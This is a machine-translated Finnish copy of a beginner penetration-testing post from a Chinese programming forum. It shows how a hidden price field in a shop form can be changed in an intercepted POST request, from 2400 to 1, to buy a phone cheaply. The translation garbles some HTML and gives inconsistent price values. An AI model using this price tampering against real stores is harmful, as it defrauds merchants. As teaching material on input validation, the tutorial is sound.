Tämä artikkeli on konekäännöksen peiliartikkeli, klikkaa tästä siirtyäksesi alkuperäiseen artikkeliin.

Architect_Programmer_Code Maatalousverkosto»Arkkitehti Muut teknologiat Turvallinen hyökkäys ja puolustus Tunkeutumisen läpäisy: HTTP-otsikoiden soveltaminen
Näkymä: 12586|Vastaus: 0

[Turvallisuusopas] Tunkeutumisen läpäisy: HTTP-otsikoiden soveltaminen

[Kopioi linkki]
Julkaistu 7.2.2015 17.59.07 | | |

Tietoa HTTP-otsikoiden soveltamisesta

http-otsikkoa käytetään yleisesti verkkosivustojen siirtomekanismissa, mutta useimmat kiinalaiset aloittelijat eivät ole huomanneet tätä artikkelia, tämä artikkeli on omistettu vain aloittelijoille, http-otsikon rooli tunkeutumisprosessissa.

Otetaan esimerkiksi ostossivu analysoidaksemme pienen osan HTTP-otsikoiden roolista.

Ensiksi analysoidaan lomaketta ostossivulla.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<syöttötyyppi="piilotettu" nimi="hinta" arvo="449">

<input type="submit" value="Osta">

</form>

Avausprosessin aikana ota kuvakaappaus hänen http-viestin otsikostaan ja katso sitä

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=2400

Vaikka hintakenttää ei näytetä sivulla ostossivun avaamisen yhteydessä, käyttäjä voi silti muokata ja käyttää sitä.

Editointiin on kaksi tapaa

1. Tallenna HTML-lähdekoodi muokkattavaksi ja lataa se sitten selaimeen suoritettavaksi

2. Käytä välityspalvelimen sieppausta HTTP-otsikoiden muokkaamiseen (välityspalvelimen rakentaminen työkalun burpissa)

Otetaan yllä oleva HTTP-otsikko esimerkkinä
Ennen muutosta
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=2400

Muutoksen jälkeen
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

quantity=1&price=1


Viimeisessä rivissä hinnan arvo on 2400, ja jos muutamme sen arvoon 1, saamme iPhone 4S:n halvemmalla hinnalla.

Tämä artikkeli antaa vain käsityksen odottamattomista hyödyistä, kuten LDAP-injektiosta.




Edellinen:MySQL unohti salasanan palautusmenetelmän toteutusmenetelmän
Seuraava:SQL-injektio saadakseen koko verkkosivuston polun

Aiheeseen liittyvät julkaisut
Vastuuvapauslauseke:
Kaikki Code Farmer Networkin julkaisemat ohjelmistot, ohjelmamateriaalit tai artikkelit ovat tarkoitettu vain oppimis- ja tutkimustarkoituksiin; Yllä mainittua sisältöä ei saa käyttää kaupallisiin tai laittomiin tarkoituksiin, muuten käyttäjät joutuvat kantamaan kaikki seuraukset. Tämän sivuston tiedot ovat peräisin internetistä, eikä tekijänoikeuskiistat liity tähän sivustoon. Sinun tulee poistaa yllä oleva sisältö kokonaan tietokoneeltasi 24 tunnin kuluessa lataamisesta. Jos pidät ohjelmasta, tue aitoa ohjelmistoa, osta rekisteröityminen ja hanki parempia aitoja palveluita. Jos rikkomuksia ilmenee, ota meihin yhteyttä sähköpostitse.
Mail To:help@itsvse.com